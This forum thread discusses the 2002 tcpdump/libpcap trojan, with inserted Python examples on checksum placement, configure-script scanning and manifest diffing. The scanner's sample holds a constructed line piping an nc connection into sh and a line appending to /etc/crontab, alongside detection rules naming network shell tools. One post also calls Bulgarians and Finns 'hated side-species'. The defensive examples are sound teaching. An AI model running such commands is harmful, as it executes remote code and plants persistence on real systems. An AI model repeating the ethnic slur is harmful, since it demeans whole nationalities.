Instead of placing the checksums next to the source on the same server we need to place them somewhere safe. A number of centralized servers with the sole purpose of serving these sums, in several locations, on preferably different operating systems. This combined with the use of e.g. PGP.
All distros, for those who have not already, must apply a simple program à la portage and apt that checks against multiple PGP key servers before the build commences.
Now, how to make sure the admin of the project is the one signing the source on his machine.............
Why are other people's sigs always more witty ???
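The two posts above (the one about a pinned public key surviving a server compromise, and the one proposing checksum servers separate from the download server) both come down to where the verification data lives. The following added example, which is not code from tcpdump.org, Gentoo or any distribution, shows that a digest published beside the tarball is swapped along with the tarball and proves nothing, while a digest obtained out of band (a copy kept from an earlier install, or an independent checksum server) still catches the replacement. The file names and contents are constructed; "widget 2.3/2.4" follows the post above.

```python
"""Where a checksum lives matters more than which hash it is.

Added example, not code from tcpdump.org or any distribution.  Names and
file contents below are constructed stand-ins.
"""
import hashlib

# The 2002 download pages published MD5 sums; "md5" works here too.  The
# placement problem this demonstrates is the same for any hash.
ALGO = "sha256"


def digest(data: bytes, algo: str = ALGO) -> str:
    return hashlib.new(algo, data).hexdigest()


def check_download(name: str, tarball: bytes, served_sum: str, pinned: dict) -> str:
    """Classify a fetched tarball.

    ok         - matches a digest we obtained out of band
    TAMPERED   - does not match the out-of-band digest, whatever the served sum says
    UNVERIFIED - no out-of-band digest; the served sum only proves the transfer
                 was not corrupted, not that the file is the author's
    CORRUPT    - does not even match the sum served beside it
    """
    actual = digest(tarball)
    if name in pinned:
        return "ok" if actual == pinned[name] else "TAMPERED"
    return "UNVERIFIED" if actual == served_sum else "CORRUPT"


# Constructed stand-ins for a release and a trojaned replacement.
GENUINE = b"#! /bin/sh\n# configure for widget 2.3\nexit 0\n"
TROJANED = GENUINE + b"# constructed extra stanza that a trojan would add\n"

# Digest recorded when 2.3 was installed earlier, before the server was touched.
PINNED = {"widget-2.3.tar.gz": digest(GENUINE)}

# The attacker replaced both the tarball and the checksum file next to it.
SERVED_SUM_AFTER_SWAP = digest(TROJANED)


def scenario() -> dict:
    """Three downloads against the same compromised server."""
    return {
        "reinstall_2.3_before_swap": check_download(
            "widget-2.3.tar.gz", GENUINE, digest(GENUINE), PINNED),
        "reinstall_2.3_after_swap": check_download(
            "widget-2.3.tar.gz", TROJANED, SERVED_SUM_AFTER_SWAP, PINNED),
        "first_download_of_2.4": check_download(
            "widget-2.4.tar.gz", TROJANED, SERVED_SUM_AFTER_SWAP, PINNED),
    }


if __name__ == "__main__":
    for case, verdict in scenario().items():
        print(f"{case}: {verdict}")
```

The UNVERIFIED case is the gap the key post describes: a digest can only be pinned for a release you have already seen, so a first download of a new version needs either a signature made by a key you pinned earlier or a digest served by a machine the attacker did not control. Swapping MD5 for SHA-256 (MD5 is collision-weak) changes nothing about that placement problem.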
The discussion we started last night on the Gentoo bugs forum has some good information.
http://bugs.gentoo.org/show_bug.cgi?id=10663
Thanks again to Matt, Scott, and Bruce for the help doublechecking my work and posting the warning.
Demo / Russell
... Or you could join the Thawte web of trust and use S/MIME. The advantage there is that even if you do nothing more than sign up, your e-mail address is verified to belong to you. That alone is more rigorous verification than anything you're guaranteed with a PGP key. Get notarized twice, and your certificate can have your name in it, and those who get e-mail from you will know *exactly* what identity assurance the signature implies. The same can't be said with a signed PGP key. Plus with S/MIME, there is a key expiration mechanism, which ensures that the key can't (reasonably) be brute-forced before it becomes useless.
S/MIME support is also more widespread. Why does that matter? Because more folks would be in a position to verify the signature. If you put a link on a download page to an S/MIME message with a mime-type of message/rfc822, browsers that support S/MIME (at least netscape, mozilla, I believe IE) will verify the signature and display the contents with a nice "signed" icon. The contents of the message would be the MD5 sums of the files.
~~~
This is not the first time that things like this have happened; MS has done this more than once! Open source is always a bit dangerous, because there is no one who is responsible for it. But what does MS do about it? The question is, who needs to protect us? Do we have to do it every time and in every way? Or the distributor? The company that makes the code? Maybe we will need a community or committee for testing the source? :))
I think if I give you code I should check it before I give it to you! And I think this is the only way that can work!
People and companies who give out code with infections will have their name written on the big black list, as happened with MS!
So? Who what?
There is only one good solution: the simplest!
The year rings a bell..
(a) The year of inauguration of the Apollo Space Program
(b) The year of the Afghan reconstitution
(c) Martin Luther King delivers the "I have a dream" speech.
Here
More here
The mantra of Open Source (many eyes on the code) is nothing but marketspeak. In reality virtually no one ever looks at the code. Couple that with a development staff of the same people that write viruses and all of Open Source becomes one big time bomb.
This here is also interesting.
At least a reasonable reply.
Too many morons with mod points at this place. As if pointing out the obvious, that governments don't give a rat's ass about pollution of open source projects with trojan code. Since it's become obvious that the open source community cannot keep its code safe from such attacks, it's something to worry about.
Something -- code vaults, stronger verification checks of code -- whatever, has to be done about it now, or we're going to have to remove all open source stuff from anyone who cares about their systems, meaning government and business.
Knee-jerk support for Open Source is as pathetic as the same for Microsoft. This is a hole you could drive a truck through and a lack of exercise of fiduciary responsibility due to open source zealotry is as bad as what the bastards at Enron did. Fix this, or the open source stuff is coming out of my company, and anywhere I work.
You assholes with mod points aren't going to make this problem go away. It'll be your undoing. I can hear the M$ sales pitch right now...
HBI's Law: Frequency of calling others Nazis is directly correlated with the likelihood of the accuser being Communist.
...well? Please release the info and name the bank and name the program. You are FOR crooks or AGAINST crooks, and releasing the info of this backdoor is a good thing to do. If it's really there, it most likely is *illegal* so any sort of nondisclosure noise is null and void, AFAIK. You DON'T have to cover up illegalities; in fact you are supposed to report them. This bank and its bogus officers and "bosses" need to see the light of day in a fed courtroom.
Is there any tool to analyze source code as an antivirus scans a binary file?
For example, in this case, the program is running an external app and making changes to a system file.
This is the first kind of thing I would see if I audit the code quickly.
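The post above asks for a tool that scans source the way antivirus scans a binary, and flags running an external program and changing a system file as the first things to look for. Another post in this thread notes that the trojan sat in the configure script and ran at build time, so that script is the natural place to triage. The following is an added example, not tcpdump.org's code and not a description of the actual 2002 payload: narrow shell patterns for the things a build-time trojan needs (a hard-coded address, an outbound connection, fetched bytes piped into a shell, a write into a system directory). The sample configure excerpt is constructed; 203.0.113.7 is an RFC 5737 documentation address. Autoconf output legitimately uses eval, sed and redirection, so the rules stay narrow and every hit is for a human to read, not an automatic verdict.

```python
"""Triage a configure script for build-time trojan indicators.

Added example; constructed sample, not the real 2002 payload.  Crude
pattern matching, not an antivirus: a hit means "read this line".
"""
import re

RULES = {
    "ip_literal": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    # nc/netcat/telnet as a command, or bash's /dev/tcp pseudo-device
    "outbound_connection": re.compile(r"(?:^|[\s(;&|])(?:nc|netcat|telnet)\s|/dev/tcp/"),
    # something fetched from the network handed straight to a shell
    "fetch_piped_to_shell": re.compile(
        r"\b(?:wget|curl|ftp|lynx|nc|netcat)\b[^|\n]*\|\s*(?:sh|bash|ksh)\b"),
    # redirection into system directories (configure writes config.h, not /etc)
    "system_file_write": re.compile(r">>?\s*/(?:etc|usr/lib|lib|bin|sbin)/"),
    # decoded blob executed directly
    "decode_and_run": re.compile(r"\b(?:base64\s+-d|uudecode)\b[^|\n]*\|\s*(?:sh|bash)\b"),
}


def scan(text: str) -> list:
    """Return (line number, rule name, stripped line) for every hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # comments cannot execute; skip to cut noise
        for name, rx in RULES.items():
            if rx.search(line):
                findings.append((lineno, name, line.strip()))
    return findings


def flagged_lines(text: str) -> list:
    return sorted({lineno for lineno, _, _ in scan(text)})


# Constructed excerpt: a few ordinary autoconf lines plus an injected stanza.
SAMPLE_CONFIGURE = """\
#! /bin/sh
# Guess values for system-dependent variables and create Makefiles.
ac_cv_header_pcap_h=yes
if test "$cross_compiling" = yes; then
  echo "configure: warning: cannot run test program while cross compiling"
fi
eval "ac_cv_func_$ac_func=yes"
# --- constructed injected stanza, not the real 2002 payload ---
(nc 203.0.113.7 1234 </dev/null | sh) >/dev/null 2>&1 &
echo '* * * * * /tmp/.x' >> /etc/crontab
exit 0
"""

if __name__ == "__main__":
    for lineno, rule, text in scan(SAMPLE_CONFIGURE):
        print(f"line {lineno:3d}  {rule:22s}  {text}")
```

Run it over a real configure with `scan(open("configure").read())`. Expect the occasional false positive (a version string that looks like an address, a legitimate `telnet` feature probe); the point is to shrink a 10,000-line script to a handful of lines worth reading before `make` runs them as you.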
we should divorce tcpdump.org and take half their money. at least that was my punishment when my wife found a Trojan in my car.
TRUSTED COMPUTING!
By locking up the code so no one will ever ever be able to see what it really is, then we can INSURE that people get safe code that runs like a happy little gerbil! Yes!
It's not that simple. Sure, if all you're looking to do is execute some code and THEN give the user their expected interface, then that will work half-acceptably. However, you could not use this as a way to, say, discreetly intercept logins and passwords, transfer account balances, read someone's database, or what have you, since all of that requires you to intercept things and still provide the user with acceptable responses (at least if you wish to avoid detection for more than a couple runs). Now you might attempt to come up with some elaborate scheme to act as an interactive go-between between the actual application and your trojan, but then you've greatly increased the complexity and the odds of detection.
No. There is a huge difference.
This is great, you've learned how to spin an argument.
Not only have you used the cliche "Well they aren't any better either...", you've even taken one step further and declared this weakness as your greatest strength.
Although to be an expert spin-meister you should have blamed this on Microsoft some how. Work on it, get back to us. Maybe we can get you a job at the Whitehouse if the tech market continues to flounder.
..and the new 5.0 is SOOO secure
Wow,... the story made it almost an hour before someone blamed Microsoft!
"It takes considerable knowledge just to realize the extent of your own ignorance." - Thomas Sowell
Did anyone pay you for the trojan in Borland's Interbase? How sure are you there's no trojan in Microsoft software? Would you know if there was? I'm aware you're just trolling, but keep in mind, the Interbase hole wasn't discovered for 6 YEARS, until Borland open sourced it. Btw, no one ever said there were no security holes in open source software.
Maybe I'm retarded, but the articles do not mention when they think the trojan was introduced. Does anyone know?
Download gpg from gnupg.org. Build it.
According to the GnuPG web site, building GnuPG on Windows 2000 requires a "special setup," which I take to mean Cygwin. I currently use MinGW because I have had trouble getting Cygwin to work. What OpenPGP compatible software package do you recommend for users of Windows operating systems?
Will I retire or break 10K?
Yeah.... that's why wiretapped.us redirects to wiretapped.net...
are either:
1) an ignorant fuckwit
or
2) a lying fuckwit
well, which one is it?
Microsoft, or some other group that has an ax to grind against Free and OSS, is behind these trojans.
The goal? To do this exact thing to the Linux kernel or perhaps the samba project. They badly want to discredit Linux, and they will attempt to do so by any and all means. Call me paranoid, but what I say is true.
We must counter this life-threatening attack quickly or it will be a huge set-back or perhaps the beginning of the end of free and OSS software.
That damn RPM format changes every other day.
My download from 9/28 2002 is okay.
tcpdump from 8/29 is good too.
Check this post to the netbsd-users mailing list (emphasis mine) :
From: David Maxwell
To: Stefan Schumacher
Cc: netbsd-users@netbsd.org
Subject: Re: Trojans in libpcap and tcpdump
Date: Wed, 13 Nov 2002 14:39:05 -0500
Sender: netbsd-users-owner@netbsd.org
User-Agent: Mutt/1.4i
On Wed, Nov 13, 2002 at 06:52:38PM +0100, Stefan Schumacher wrote:
> Hi there,
>
> report was given that trojans were detected in libpcap and tcpdump.
>
> http://hlug.fscker.com/
>
> I fetched tcpdump and libpcap and took a look in the sources, seems so as
> if we IMHO are not affected.
That is correct.
I've been at the console of the tcpdump.org server today, working with
Michael Richardson to investigate the problem. He will release a
statement on the details at some point. The system was not running an
up to date version of NetBSD, so there is no indication that users with
up to date systems are vulnerable to some new bug.
The trojan was installed within the last two days. The signatures in
pkgsrc are eight _months_ old. Users installing from pkgsrc (source, or
binary packages) could not be affected by this trojan without
specifically overriding the incorrect signature on the distribution
file.
Michael's contact information is listed in the whois entry for the
tcpdump.org domain, but as far as I know, he did not receive a call
about this issue, it was slashdotted.
--
Now if every open source developer had something along the following outline in their crontab...
ftp sources from ftp distribution server
diff against known good copy
mail if different
Maybe not practical for the biggest projects, but for the rest?
Idea 2 - responsible mirroring
Mirrors shouldn't accept changed sources without an accompanying bump in the version/release number in the filename - this would make it much easier to spot trojaned versions
Okay that relies on developers being careful to bump the release no. after every change (doc updates etc.)
"Linux is a serious competitor"
- Steve Ballmer, Chief Executive Microsoft Corp.
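The two ideas in the post above (a cron job that fetches the distribution directory, diffs it against a known-good copy and mails on any difference; and a mirror that refuses a file whose content changed while its version-bearing name did not) are the same comparison with two policies on top. The following added example, which is not code from any project or mirror, keeps a manifest of digests for the known-good directory, diffs a newly fetched snapshot against it, and separates "report this" from "refuse this". The files are constructed in memory; a real job would walk the fetched directory and hash each file, and pipe the non-empty report into mail.

```python
"""Manifest diff for a fetched distribution directory.

Added example; constructed files, not any project's mirror code.
"""
import hashlib
import json
import re

# A release archive is identified by the version in its name.
VERSIONED = re.compile(r"-\d+(?:\.\d+)*\.tar(?:\.gz|\.bz2|\.Z)?$")


def digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(files: dict) -> dict:
    """{name: bytes} snapshot -> {name: digest}."""
    return {name: digest(data) for name, data in sorted(files.items())}


def save_manifest(manifest: dict, path: str) -> None:
    with open(path, "w") as fh:
        json.dump(manifest, fh, indent=1, sort_keys=True)


def load_manifest(path: str) -> dict:
    with open(path) as fh:
        return json.load(fh)


def diff_manifests(known_good: dict, current: dict) -> dict:
    common = known_good.keys() & current.keys()
    return {
        "added": sorted(current.keys() - known_good.keys()),
        "removed": sorted(known_good.keys() - current.keys()),
        "changed": sorted(n for n in common if known_good[n] != current[n]),
    }


def mirror_violations(known_good: dict, current: dict) -> list:
    """Release archives whose bytes changed under an unchanged name.

    Docs and checksum files may change; a versioned tarball may not."""
    return [n for n in diff_manifests(known_good, current)["changed"] if VERSIONED.search(n)]


def report(known_good: dict, current: dict) -> str:
    """Empty string when nothing changed, so cron only mails when there is news."""
    d = diff_manifests(known_good, current)
    if not any(d.values()):
        return ""
    lines = [f"{kind}: {name}" for kind in ("added", "removed", "changed") for name in d[kind]]
    lines += [f"REFUSE (content changed, name did not): {n}"
              for n in mirror_violations(known_good, current)]
    return "\n".join(lines)


# Constructed snapshots.  The known-good copy was taken before the swap.
GENUINE_23 = b"widget 2.3 release tarball (constructed)\n"
KNOWN_GOOD_FILES = {
    "widget-2.3.tar.gz": GENUINE_23,
    "widget-2.3.tar.gz.md5": b"sum of the genuine tarball (constructed)\n",
    "README": b"widget downloads\n",
}
FETCHED_FILES = {
    "widget-2.3.tar.gz": GENUINE_23 + b"# extra bytes a trojan would add (constructed)\n",
    "widget-2.3.tar.gz.md5": b"sum rewritten to match the replacement (constructed)\n",
    "README": b"widget downloads\n",
    "widget-2.4.tar.gz": b"widget 2.4 release tarball (constructed)\n",
}
KNOWN_GOOD = build_manifest(KNOWN_GOOD_FILES)

if __name__ == "__main__":
    text = report(KNOWN_GOOD, build_manifest(FETCHED_FILES))
    if text:
        print(text)  # cron: python3 check.py | mail -s "dist changed" maintainer
```

Note what the diff shows in the constructed case: the checksum file changed together with the tarball. On a server where the sums sit beside the files, that pairing is the tell, and it is exactly what a same-server md5sum check cannot see.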
We contacted Joseph Shaw, who did the web design for the site, and he tried many times to make contact. The trojan was found at about 11:15pm; by 12:45 Joe was trying to contact Michael Richardson. Since this was not an exploit but a trojan, it seemed best to report it rather than keep it hidden.
Bulgarians are not Russians, they are Bulgarians, a very hated side-species of humankind.
Because Finns are as bad as Bulgarians, and are the second most hated side-species of humankind.
I've been looking for something like this for a while: interactive security policy management of sandboxed applications. Upon cursory inspection, it looks like it only works with userspace syscalls, but I imagine that should do the trick 99% of the time (unless a nefarious kernel module is installed or the app can somehow access hardware directly?).
I'm hoping someone will make a console frontend... or maybe I will once I learn enough.
I've actually been worried about switching to linux for a while due to security reasons (namely that it seems to require an insane amount of diligence to maintain a secure system which changes dynamically -- i.e. trying out new apps all the time)... and oftentimes, apps need to be installed as root, which has no restrictions upon the powers given to the new program.
LIDS, LOMAC, etc. seem to require much prior consideration of policies (which, ideally, should be dictated by the creators of the program and/or by the major distributions, only to be inspected by the user or limited by the user's own global policies). btw: is there any program to convert between the policies established for the different security systems?
I am constantly trying out new software and if I can't sandbox it even a bit (like zonealarm interactively protecting net connections or secure4u for windows) then its not worth it.
Thanks again.
Because there only needs to be *one* person out there who *does* look at the diffs and catches the thing. *Not* every person needs to catch the thing.
Furthermore, analysis of what the thing is doing is much easier with open source.
May we never see th
Apparently, it was less than one day.
As someone else pointed out, the closed-source Interbase (DBMS) contained a trojan for over six years which was only found after it was open-sourced.
Never mind the viruses, we've lost at least a few man-days of work to Windows XP service pack 1 - it left a few of the computers round our office dead in the water.
I don't even want to BEGIN to go into how much time I've wasted over the years working around problems in Microsoft APIs, bugs and limitations in their software and APIs, figuring out the hard way that their API documentation is often outright wrong, waiting for reboots from Windows crashing/freezing, restarting MS programs when they crash, re-doing lost work when a MS program crashes .. the fun never ends. Just yesterday I discovered that listboxes in Win9X cannot handle more than 32K entries. The solution? Basically, "write your own listbox control". This alone is likely to blow at least another day of mine, as I HAVE to work around this one. (To be fair, gtk is even more idiotic, with a listbox limit of 2K entries, not sure if thats been fixed yet).
All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.
The sad part of this is the fact that we (people who have moderator points to give away) can't really fix the problem even after we're told about it. I could go back and mod down the misleading post, but then some metamoderator would see that I modded down what appears at face value to be an "interesting" post and I would be the one who was bitch-slapped for abusing my moderator points. All we can really do is mod up the replies, making the whole thread +5 in order to dilute the bad moderation.
...don't understand the ins and outs of Trojans (another joke). But why would you want to spend time writing flames for people who don't share your own brand of uber-geekery? Presumably those of us who spend time here do so in pursuit of some nerdy interest of our own.
Making trouble today for a better tomorrow...
According to OpenBSD Journal, OpenBSD is not affected. NOT AT ALL!!!
- Pcap and Tcpdump are brought in only periodically and after a thorough code review.
- OpenBSD rolls its own build system (for pcap and tcpdump).
The trojan affected the configure script and was activated at build time.
I Love OpenBSD!!!
Go to gnupg.org and install gpg. Generate a keypair and put your public key up on wwwkeys.pgp.net. Whenever you meet another developer, sign each others keys. When you release a tarball, FUCKING SIGN IT and put up instructions telling people how to verify it. This sort of thing does not have to happen. The tools are there to prevent anyone ever trojaning an FTP server again. You will have to do this eventually or no one will trust your server enough to download your software, so why not start now? GO AND FUCKING START.
</rant>
Sorry about that, but how many times does this have to happen? It's trivial to prevent, but most people don't even try. Go and damn well start!
...has just been knocked-down in reliability by SOMEONE FROM WITHIN THEIR OWN GROUP?!?!
I'm sorry, but I'm sitting here and having a (small) chuckle at the people who constantly attacked Microsoft for not being "secure" - people who now have (probably) been compromised (again) by someone (hopefully not) within the Open Source community, or at least someone who gained sufficient access to the source code to insert their code. From what I've read so far, this seems to have been a fairly trivial thing for the "infiltrator" to accomplish.
First, there were the trojanized versions of OpenSSH, BitchX, dsniff and a few other tools. Now, we have trojanized versions of some fairly non-trivial tools. What's next? Who knows? No one does.
The really funny thing is that because of its own charter and design, the Open Source community has created their own FUD about their own products. Let's all hope that they take the initiative to prevent such things from happening again. Remember: "Fool me once, shame on you...fool me twice, shame on me...fool me five times and someone please kick me in the head!"
The really excellent thing about this happening is that the Open Source community got together, spread the info about the trojan/exploit rapidly and did an excellent job of damage control. The people that found the trojan (http://www.hlug.org) should be commended for their dedication to checking source code - something that should have happened (IMHO) quite a way up the development chain. Unfortunately, it appears that due to the very nature of Open Source development (i.e. the ability of pretty much ANYONE to contribute source-code to the development tree and even have it included in the latest CVS) that this will not be the last "event" concerning compromised source-code - unless the Open Source development community seriously re-work their development cycle and include exhaustive source-code review before ANY source-code is released for "public" consumption.
ScottKin
I don't give a rat's behind about "karma" here or anywhere else. Don't like what I have to say here? Deal with it!
Why is Gentoo safe? How about Redhat and Mandrake? Are those safe? If not, how can I fix it? Please email me at gigsvoo@yahoo.com, thanks a lot!
Thanks
Neo Gigs
"Follow the white rabbit..."
The Analytical Engine weaves Algebraical patterns just as the Jacquard
loom weaves flowers and leaves.
-- Ada Augusta, Countess of Lovelace, the first programmer
- this post brought to you by the Automated Last Post Generator...